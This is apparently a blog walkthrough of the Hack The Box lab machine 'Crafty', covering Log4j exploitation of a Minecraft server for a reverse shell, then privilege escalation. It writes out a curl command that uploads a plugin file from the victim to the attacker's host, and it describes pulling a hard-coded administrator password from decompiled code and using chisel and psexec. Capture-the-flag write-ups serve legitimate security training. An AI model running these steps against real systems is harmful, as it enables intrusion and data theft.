๐Ÿ’€
Samfisher blog
  • Common Vulnerabilities and Exposures
    • ๐ŸงบCVE-2023-27163
    • ๐Ÿ›ค๏ธMaltrail - OS Command Injection
  • ๐Ÿ‘พCrafty - HTB
  • ๐ŸŒŒSkyfall - HTB
  • ๐Ÿ”ขRegistryTwo - HTB
  • โฌ‡๏ธDownload - HTB
  • โ˜ ๏ธCybermonday - HTB
  • ๐Ÿ€Rebound - HTB
  • ๐Ÿ‘จโ€๐Ÿ’ผOffice - HTB
  • Wave - FlagYard
  • Blackhat - Saudi <Web> iFrame
Powered by GitBook
On this page

Crafty - HTB

https://app.hackthebox.com/machines/Crafty

PreviousMaltrail - OS Command InjectionNextSkyfall - HTB

Last updated 1 year ago

User

first download minecraft client

https://github.com/MCCTeam/Minecraft-Console-Client

download also log4j exploit

Also download jdk1.8.0_20

https://download.oracle.com/otn/java/jdk/8u202-b08/1961070e4c9b4e26a04e7f5a083f551e/jdk-8u202-linux-x64.tar.gz

first lets connect to the minecraft server ,but note that sometimes it will only gives you 1 try to connect then either you need to use game launcher and do it through the chat ,or reset the machine .

first you need to modify the poc.py from /bin/sh to cmd.exe

run a listener on port 1337 as in command

Root

run upload listener

and from victim machine do

curl -i -XPOST -F "files=@C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar" http://ur-IP/upload

use java decompiler jd-gui

found a password

its administrator password ,we can use manyways but my approach was to forward port 445 smb using chisel ,then use psexec from impacket tools to connect as administrator ,you can also use runas.exe

๐Ÿ‘พ
  • User
  • Root
Runas.exe
LogoGitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.GitHub